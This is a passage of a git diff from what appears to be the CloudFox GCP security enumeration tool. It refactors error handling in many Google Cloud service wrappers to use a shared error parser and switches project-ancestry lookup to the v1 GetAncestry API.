gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") } var jobs []JobInfo resp, err := service.Projects.Regions.Jobs.List(projectID, region).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to list jobs: %v", err) + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") } for _, job := range resp.Jobs { diff --git a/gcp/services/dnsService/dnsService.go b/gcp/services/dnsService/dnsService.go index c065f08d..a1226caf 100644 --- a/gcp/services/dnsService/dnsService.go +++ b/gcp/services/dnsService/dnsService.go @@ -2,9 +2,9 @@ package dnsservice import ( "context" - "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" dns "google.golang.org/api/dns/v1" ) @@ -57,7 +57,7 @@ func (ds *DNSService) Zones(projectID string) ([]ZoneInfo, error) { service, err := dns.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create DNS service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") } var zones []ZoneInfo @@ -72,7 +72,7 @@ func (ds *DNSService) Zones(projectID string) ([]ZoneInfo, error) { }) if err != nil { - return nil, fmt.Errorf("failed to list zones: %v", err) + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") } return zones, nil @@ -84,7 +84,7 @@ func (ds *DNSService) Records(projectID, zoneName string) ([]RecordInfo, error) service, err := dns.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create DNS service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") } var records []RecordInfo @@ -106,7 +106,7 @@ func (ds *DNSService) Records(projectID, zoneName string) ([]RecordInfo, error) }) if err != nil { - return nil, fmt.Errorf("failed to list records: %v", err) + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") } return records, nil diff --git a/gcp/services/domainWideDelegationService/domainWideDelegationService.go b/gcp/services/domainWideDelegationService/domainWideDelegationService.go index 77c8528c..09a7aae0 100644 --- a/gcp/services/domainWideDelegationService/domainWideDelegationService.go +++ b/gcp/services/domainWideDelegationService/domainWideDelegationService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" iam "google.golang.org/api/iam/v1" ) @@ -52,7 +53,7 @@ func (s *DomainWideDelegationService) GetDWDServiceAccounts(projectID string) ([ ctx := context.Background() service, err := iam.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create IAM service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } var dwdAccounts []DWDServiceAccount @@ -61,7 +62,7 @@ func (s *DomainWideDelegationService) GetDWDServiceAccounts(projectID string) ([ parent := fmt.Sprintf("projects/%s", projectID) resp, err := service.Projects.ServiceAccounts.List(parent).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to list service accounts: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } for _, sa := range resp.Accounts { diff --git a/gcp/services/filestoreService/filestoreService.go b/gcp/services/filestoreService/filestoreService.go index 0335c2d4..c6af8cc9 100644 --- a/gcp/services/filestoreService/filestoreService.go +++ b/gcp/services/filestoreService/filestoreService.go @@ -38,7 +38,7 @@ func (s *FilestoreService) ListInstances(projectID string) ([]FilestoreInstanceI ctx := context.Background() service, err := file.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Filestore service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "file.googleapis.com") } var instances []FilestoreInstanceInfo diff --git a/gcp/services/functionsService/functionsService.go b/gcp/services/functionsService/functionsService.go index cf68eb58..3f35499e 100644 --- a/gcp/services/functionsService/functionsService.go +++ b/gcp/services/functionsService/functionsService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" cloudfunctions "google.golang.org/api/cloudfunctions/v2" ) @@ -92,7 +93,7 @@ func (fs *FunctionsService) Functions(projectID string) ([]FunctionInfo, error) service, err := cloudfunctions.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Cloud Functions service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") } var functions []FunctionInfo @@ -117,7 +118,7 @@ func (fs *FunctionsService) Functions(projectID string) ([]FunctionInfo, error) }) if err != nil { - return nil, fmt.Errorf("failed to list functions: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") } return functions, nil diff --git a/gcp/services/gkeService/gkeService.go b/gcp/services/gkeService/gkeService.go index 2330a648..813b4085 100644 --- a/gcp/services/gkeService/gkeService.go +++ b/gcp/services/gkeService/gkeService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" container "google.golang.org/api/container/v1" ) @@ -123,7 +124,7 @@ func (gs *GKEService) Clusters(projectID string) ([]ClusterInfo, []NodePoolInfo, service, err := container.NewService(ctx) if err != nil { - return nil, nil, fmt.Errorf("failed to create GKE service: %v", err) + return nil, nil, gcpinternal.ParseGCPError(err, "container.googleapis.com") } // List clusters across all locations @@ -131,7 +132,7 @@ func (gs *GKEService) Clusters(projectID string) ([]ClusterInfo, []NodePoolInfo, resp, err := service.Projects.Locations.Clusters.List(parent).Do() if err != nil { - return nil, nil, fmt.Errorf("failed to list clusters: %v", err) + return nil, nil, gcpinternal.ParseGCPError(err, "container.googleapis.com") } var clusters []ClusterInfo diff --git a/gcp/services/hmacService/hmacService.go b/gcp/services/hmacService/hmacService.go index 071dda23..f7cc8981 100644 --- a/gcp/services/hmacService/hmacService.go +++ b/gcp/services/hmacService/hmacService.go @@ -48,7 +48,7 @@ func (s *HMACService) ListHMACKeys(projectID string) ([]HMACKeyInfo, error) { storageService, err = storage.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create storage service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") } var keys []HMACKeyInfo @@ -63,7 +63,7 @@ func (s *HMACService) ListHMACKeys(projectID string) ([]HMACKeyInfo, error) { return nil }) if err != nil { - return nil, fmt.Errorf("failed to list HMAC keys: %v", err) + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") } return keys, nil diff --git a/gcp/services/iamService/iamService.go b/gcp/services/iamService/iamService.go index 2a1ba52f..f268dfa5 100644 --- a/gcp/services/iamService/iamService.go +++ b/gcp/services/iamService/iamService.go @@ -8,11 +8,11 @@ import ( iampb "cloud.google.com/go/iam/apiv1/iampb" resourcemanager "cloud.google.com/go/resourcemanager/apiv3" - resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" cloudidentity "google.golang.org/api/cloudidentity/v1" + crmv1 "google.golang.org/api/cloudresourcemanager/v1" iam "google.golang.org/api/iam/v1" "google.golang.org/api/option" ) @@ -187,67 +187,43 @@ type CombinedIAMData struct { InheritedRoles []PolicyBinding `json:"inheritedRoles"` } -var logger internal.Logger +var logger = internal.NewLogger() func (s *IAMService) projectAncestry(projectID string) ([]AncestryResource, error) { ctx := context.Background() - var projectsClient *resourcemanager.ProjectsClient - var foldersClient *resourcemanager.FoldersClient + + // Use the v1 GetAncestry API which only requires project-level read permissions + // This avoids needing resourcemanager.folders.get on each folder in the hierarchy + var crmService *crmv1.Service var err error if s.session != nil { - projectsClient, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + crmService, err = crmv1.NewService(ctx, s.session.GetClientOption()) } else { - projectsClient, err = resourcemanager.NewProjectsClient(ctx) + crmService, err = crmv1.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create projects client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - defer projectsClient.Close() - if s.session != nil { - foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) - } else { - foldersClient, err = resourcemanager.NewFoldersClient(ctx) - } + resp, err := crmService.Projects.GetAncestry(projectID, &crmv1.GetAncestryRequest{}).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to create folders client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - defer foldersClient.Close() - resourceID := "projects/" + projectID + // GetAncestry returns ancestors from bottom to top (project first, then parent folders, then org) + // We need to reverse to get org -> folders -> project order var ancestry []AncestryResource - - for { - if strings.HasPrefix(resourceID, "organizations/") { - ancestry = append(ancestry, AncestryResource{Type: "organization", Id: strings.TrimPrefix(resourceID, "organizations/")}) - break - } else if strings.HasPrefix(resourceID, "folders/") { - resp, err := foldersClient.GetFolder(ctx, &resourcemanagerpb.GetFolderRequest{Name: resourceID}) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to access folder %s, %v", resourceID, err), globals.GCP_IAM_MODULE_NAME) - break // Stop processing further if a folder is inaccessible - } - ancestry = append(ancestry, AncestryResource{Type: "folder", Id: strings.TrimPrefix(resp.Name, "folders/")}) - resourceID = resp.Parent - } else if strings.HasPrefix(resourceID, "projects/") { - resp, err := projectsClient.GetProject(ctx, &resourcemanagerpb.GetProjectRequest{Name: resourceID}) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to access project %s, %v", resourceID, err), globals.GCP_IAM_MODULE_NAME) - return nil, fmt.Errorf("failed to get project: %v", err) - } - ancestry = append(ancestry, AncestryResource{Type: "project", Id: strings.TrimPrefix(resp.Name, "projects/")}) - resourceID = resp.Parent - } else { - return nil, fmt.Errorf("unknown resource type for: %s", resourceID) + for i := len(resp.Ancestor) - 1; i >= 0; i-- { + ancestor := resp.Ancestor[i] + if ancestor.ResourceId != nil { + ancestry = append(ancestry, AncestryResource{ + Type: ancestor.ResourceId.Type, + Id: ancestor.ResourceId.Id, + }) } } - // Reverse the slice as we've built it from child to ancestor - for i, j := 0, len(ancestry)-1; i < j; i, j = i+1, j-1 { - ancestry[i], ancestry[j] = ancestry[j], ancestry[i] - } - return ancestry, nil } @@ -263,7 +239,7 @@ func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyB client, err = resourcemanager.NewProjectsClient(ctx) } if err != nil { - return nil, fmt.Errorf("resourcemanager.NewProjectsClient: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() @@ -286,7 +262,7 @@ func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyB // Fetch the IAM policy for the resource policy, err := client.GetIamPolicy(ctx, req) if err != nil { - return nil, fmt.Errorf("client.GetIamPolicy: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } // Assemble the policy bindings @@ -419,7 +395,7 @@ func (s *IAMService) ServiceAccounts(projectID string) ([]ServiceAccountInfo, er iamService, err = iam.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create IAM service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } var serviceAccounts []ServiceAccountInfo @@ -462,7 +438,7 @@ func (s *IAMService) ServiceAccounts(projectID string) ([]ServiceAccountInfo, er return nil }) if err != nil { - return nil, fmt.Errorf("failed to list service accounts: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } return serviceAccounts, nil @@ -516,7 +492,7 @@ func (s *IAMService) CustomRoles(projectID string) ([]CustomRole, error) { iamService, err = iam.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create IAM service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } var customRoles []CustomRole @@ -844,7 +820,7 @@ func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([ iamService, err = iam.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create IAM service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } var permissions []string @@ -854,21 +830,21 @@ func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([ // Predefined role role, err := iamService.Roles.Get(roleName).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to get role %s: %v", roleName, err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } permissions = role.IncludedPermissions } else if strings.HasPrefix(roleName, "projects/") { // Project-level custom role role, err := iamService.Projects.Roles.Get(roleName).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to get custom role %s: %v", roleName, err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } permissions = role.IncludedPermissions } else if strings.HasPrefix(roleName, "organizations/") { // Organization-level custom role role, err := iamService.Organizations.Roles.Get(roleName).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to get org custom role %s: %v", roleName, err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } permissions = role.IncludedPermissions } @@ -1003,7 +979,7 @@ func (s *IAMService) GetGroupMembership(ctx context.Context, groupEmail string) ciService, err = cloudidentity.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Cloud Identity service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") } groupInfo := &GroupInfo{ @@ -1018,7 +994,7 @@ func (s *IAMService) GetGroupMembership(ctx context.Context, groupEmail string) lookupResp, err := lookupReq.Do() if err != nil { - return nil, fmt.Errorf("failed to lookup group %s: %v", groupEmail, err) + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") } groupName := lookupResp.Name @@ -1026,7 +1002,7 @@ func (s *IAMService) GetGroupMembership(ctx context.Context, groupEmail string) // Get group details group, err := ciService.Groups.Get(groupName).Do() if err != nil { - return nil, fmt.Errorf("failed to get group details for %s: %v", groupEmail, err) + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") } groupInfo.DisplayName = group.DisplayName @@ -1061,7 +1037,7 @@ func (s *IAMService) GetGroupMembership(ctx context.Context, groupEmail string) return nil }) if err != nil { - return nil, fmt.Errorf("failed to list memberships for group %s: %v", groupEmail, err) + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") } groupInfo.MemberCount = len(groupInfo.Members) @@ -1264,14 +1240,14 @@ func (s *IAMService) GetServiceAccountIAMPolicy(ctx context.Context, saEmail str iamService, err = iam.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create IAM service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } saResource := fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, saEmail) policy, err := iamService.Projects.ServiceAccounts.GetIamPolicy(saResource).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to get IAM policy for SA %s: %v", saEmail, err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } info := &SAImpersonationInfo{ diff --git a/gcp/services/iapService/iapService.go b/gcp/services/iapService/iapService.go index 8b63f914..10492a82 100644 --- a/gcp/services/iapService/iapService.go +++ b/gcp/services/iapService/iapService.go @@ -71,7 +71,7 @@ func (s *IAPService) ListTunnelDestGroups(projectID string) ([]TunnelDestGroup, service, err = iap.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create IAP service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") } var groups []TunnelDestGroup @@ -115,12 +115,12 @@ func (s *IAPService) GetIAPSettings(projectID, resourcePath string) (*IAPSetting service, err = iap.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create IAP service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") } settings, err := service.V1.GetIapSettings(resourcePath).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to get IAP settings: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") } info := &IAPSettingsInfo{ @@ -161,12 +161,12 @@ func (s *IAPService) GetIAPBindings(projectID, resourcePath string) ([]IAPBindin service, err = iap.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create IAP service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") } policy, err := service.V1.GetIamPolicy(resourcePath, &iap.GetIamPolicyRequest{}).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to get IAP IAM policy: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") } var bindings []IAPBinding diff --git a/gcp/services/kmsService/kmsService.go b/gcp/services/kmsService/kmsService.go index 4f8d7a15..be28f325 100644 --- a/gcp/services/kmsService/kmsService.go +++ b/gcp/services/kmsService/kmsService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" kms "google.golang.org/api/cloudkms/v1" ) @@ -65,7 +66,7 @@ func (ks *KMSService) KeyRings(projectID string) ([]KeyRingInfo, error) { service, err := kms.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create KMS service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") } var keyRings []KeyRingInfo @@ -88,7 +89,7 @@ func (ks *KMSService) KeyRings(projectID string) ([]KeyRingInfo, error) { }) if err != nil { - return nil, fmt.Errorf("failed to list key rings: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") } return keyRings, nil @@ -100,7 +101,7 @@ func (ks *KMSService) CryptoKeys(projectID string) ([]CryptoKeyInfo, error) { service, err := kms.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create KMS service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") } var keys []CryptoKeyInfo diff --git a/gcp/services/loadbalancerService/loadbalancerService.go b/gcp/services/loadbalancerService/loadbalancerService.go index b498611f..a2b8661a 100644 --- a/gcp/services/loadbalancerService/loadbalancerService.go +++ b/gcp/services/loadbalancerService/loadbalancerService.go @@ -2,7 +2,6 @@ package loadbalancerservice import ( "context" - "fmt" "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -89,7 +88,7 @@ func (s *LoadBalancerService) ListLoadBalancers(projectID string) ([]LoadBalance service, err = compute.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var loadBalancers []LoadBalancerInfo @@ -132,14 +131,14 @@ func (s *LoadBalancerService) ListSSLPolicies(projectID string) ([]SSLPolicyInfo service, err = compute.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var policies []SSLPolicyInfo resp, err := service.SslPolicies.List(projectID).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to list SSL policies: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } for _, policy := range resp.Items { @@ -170,7 +169,7 @@ func (s *LoadBalancerService) ListBackendServices(projectID string) ([]BackendSe service, err = compute.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var backends []BackendServiceInfo diff --git a/gcp/services/loggingService/loggingService.go b/gcp/services/loggingService/loggingService.go index b96a3a3a..d9c83cdf 100644 --- a/gcp/services/loggingService/loggingService.go +++ b/gcp/services/loggingService/loggingService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" logging "google.golang.org/api/logging/v2" ) @@ -67,7 +68,7 @@ func (ls *LoggingService) Sinks(projectID string) ([]SinkInfo, error) { service, err := logging.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Logging service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") } var sinks []SinkInfo @@ -83,7 +84,7 @@ func (ls *LoggingService) Sinks(projectID string) ([]SinkInfo, error) { }) if err != nil { - return nil, fmt.Errorf("failed to list sinks: %v", err) + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") } return sinks, nil @@ -95,7 +96,7 @@ func (ls *LoggingService) Metrics(projectID string) ([]MetricInfo, error) { service, err := logging.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Logging service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") } var metrics []MetricInfo @@ -111,7 +112,7 @@ func (ls *LoggingService) Metrics(projectID string) ([]MetricInfo, error) { }) if err != nil { - return nil, fmt.Errorf("failed to list metrics: %v", err) + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") } return metrics, nil diff --git a/gcp/services/memorystoreService/memorystoreService.go b/gcp/services/memorystoreService/memorystoreService.go index 1e7eaf7b..52c48a8e 100644 --- a/gcp/services/memorystoreService/memorystoreService.go +++ b/gcp/services/memorystoreService/memorystoreService.go @@ -55,7 +55,7 @@ func (s *MemorystoreService) ListRedisInstances(projectID string) ([]RedisInstan service, err = redis.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Redis service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "redis.googleapis.com") } var instances []RedisInstanceInfo @@ -70,7 +70,7 @@ func (s *MemorystoreService) ListRedisInstances(projectID string) ([]RedisInstan return nil }) if err != nil { - return nil, fmt.Errorf("failed to list Redis instances: %v", err) + return nil, gcpinternal.ParseGCPError(err, "redis.googleapis.com") } return instances, nil diff --git a/gcp/services/networkEndpointsService/networkEndpointsService.go b/gcp/services/networkEndpointsService/networkEndpointsService.go index 36bea690..d60e092b 100644 --- a/gcp/services/networkEndpointsService/networkEndpointsService.go +++ b/gcp/services/networkEndpointsService/networkEndpointsService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" compute "google.golang.org/api/compute/v1" servicenetworking "google.golang.org/api/servicenetworking/v1" ) @@ -65,7 +66,7 @@ func (s *NetworkEndpointsService) GetPrivateServiceConnectEndpoints(projectID st ctx := context.Background() service, err := compute.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var endpoints []PrivateServiceConnectEndpoint @@ -140,7 +141,7 @@ func (s *NetworkEndpointsService) GetPrivateConnections(projectID string) ([]Pri ctx := context.Background() service, err := servicenetworking.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create service networking service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "servicenetworking.googleapis.com") } var connections []PrivateConnection @@ -195,7 +196,7 @@ func (s *NetworkEndpointsService) GetServiceAttachments(projectID string) ([]Ser ctx := context.Background() service, err := compute.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var attachments []ServiceAttachment diff --git a/gcp/services/notebooksService/notebooksService.go b/gcp/services/notebooksService/notebooksService.go index 8feab918..d9ca5e2e 100644 --- a/gcp/services/notebooksService/notebooksService.go +++ b/gcp/services/notebooksService/notebooksService.go @@ -82,7 +82,7 @@ func (s *NotebooksService) ListInstances(projectID string) ([]NotebookInstanceIn service, err = notebooks.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Notebooks service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") } var instances []NotebookInstanceInfo @@ -98,7 +98,7 @@ func (s *NotebooksService) ListInstances(projectID string) ([]NotebookInstanceIn return nil }) if err != nil { - return nil, fmt.Errorf("failed to list notebook instances: %v", err) + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") } return instances, nil @@ -116,7 +116,7 @@ func (s *NotebooksService) ListRuntimes(projectID string) ([]RuntimeInfo, error) service, err = notebooks.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Notebooks service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") } var runtimes []RuntimeInfo diff --git a/gcp/services/organizationsService/organizationsService.go b/gcp/services/organizationsService/organizationsService.go index 6d4fa72d..226f6dc3 100644 --- a/gcp/services/organizationsService/organizationsService.go +++ b/gcp/services/organizationsService/organizationsService.go @@ -82,7 +82,7 @@ func (s *OrganizationsService) SearchOrganizations() ([]OrganizationInfo, error) client, err = resourcemanager.NewOrganizationsClient(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create organizations client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() @@ -96,7 +96,7 @@ func (s *OrganizationsService) SearchOrganizations() ([]OrganizationInfo, error) break } if err != nil { - return nil, fmt.Errorf("failed to search organizations: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } orgInfo := OrganizationInfo{ @@ -132,7 +132,7 @@ func (s *OrganizationsService) SearchFolders(parent string) ([]FolderInfo, error client, err = resourcemanager.NewFoldersClient(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create folders client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() @@ -150,7 +150,7 @@ func (s *OrganizationsService) SearchFolders(parent string) ([]FolderInfo, error break } if err != nil { - return nil, fmt.Errorf("failed to search folders: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } folderInfo := FolderInfo{ @@ -187,7 +187,7 @@ func (s *OrganizationsService) SearchAllFolders() ([]FolderInfo, error) { client, err = resourcemanager.NewFoldersClient(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create folders client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() @@ -201,7 +201,7 @@ func (s *OrganizationsService) SearchAllFolders() ([]FolderInfo, error) { break } if err != nil { - return nil, fmt.Errorf("failed to search folders: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } folderInfo := FolderInfo{ @@ -238,7 +238,7 @@ func (s *OrganizationsService) SearchProjects(parent string) ([]ProjectInfo, err client, err = resourcemanager.NewProjectsClient(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create projects client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() @@ -258,7 +258,7 @@ func (s *OrganizationsService) SearchProjects(parent string) ([]ProjectInfo, err break } if err != nil { - return nil, fmt.Errorf("failed to search projects: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } projectInfo := ProjectInfo{ @@ -299,7 +299,7 @@ func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]Hierarchy projectsClient, err = resourcemanager.NewProjectsClient(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create projects client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer projectsClient.Close() @@ -309,7 +309,7 @@ func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]Hierarchy foldersClient, err = resourcemanager.NewFoldersClient(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create folders client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer foldersClient.Close() diff --git a/gcp/services/orgpolicyService/orgpolicyService.go b/gcp/services/orgpolicyService/orgpolicyService.go index 73f39f9d..2a147476 100644 --- a/gcp/services/orgpolicyService/orgpolicyService.go +++ b/gcp/services/orgpolicyService/orgpolicyService.go @@ -162,7 +162,7 @@ func (s *OrgPolicyService) ListProjectPolicies(projectID string) ([]OrgPolicyInf service, err = orgpolicy.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create org policy service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "orgpolicy.googleapis.com") } var policies []OrgPolicyInfo @@ -176,7 +176,7 @@ func (s *OrgPolicyService) ListProjectPolicies(projectID string) ([]OrgPolicyInf return nil }) if err != nil { - return nil, fmt.Errorf("failed to list policies: %v", err) + return nil, gcpinternal.ParseGCPError(err, "orgpolicy.googleapis.com") } return policies, nil diff --git a/gcp/services/privescService/privescService.go b/gcp/services/privescService/privescService.go index af0ef16a..fe9c070d 100644 --- a/gcp/services/privescService/privescService.go +++ b/gcp/services/privescService/privescService.go @@ -125,12 +125,12 @@ func (s *PrivescService) AnalyzeProjectPrivesc(projectID string) ([]PrivescPath, crmService, err = cloudresourcemanager.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create CRM service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } policy, err := crmService.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Do() if err != nil { - return nil, fmt.Errorf("failed to get project IAM policy: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } var paths []PrivescPath diff --git a/gcp/services/pubsubService/pubsubService.go b/gcp/services/pubsubService/pubsubService.go index f83198fb..d4767116 100644 --- a/gcp/services/pubsubService/pubsubService.go +++ b/gcp/services/pubsubService/pubsubService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" pubsub "google.golang.org/api/pubsub/v1" ) @@ -73,7 +74,7 @@ func (ps *PubSubService) Topics(projectID string) ([]TopicInfo, error) { service, err := pubsub.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Pub/Sub service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") } var topics []TopicInfo @@ -101,7 +102,7 @@ func (ps *PubSubService) Topics(projectID string) ([]TopicInfo, error) { }) if err != nil { - return nil, fmt.Errorf("failed to list topics: %v", err) + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") } return topics, nil @@ -113,7 +114,7 @@ func (ps *PubSubService) Subscriptions(projectID string) ([]SubscriptionInfo, er service, err := pubsub.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create 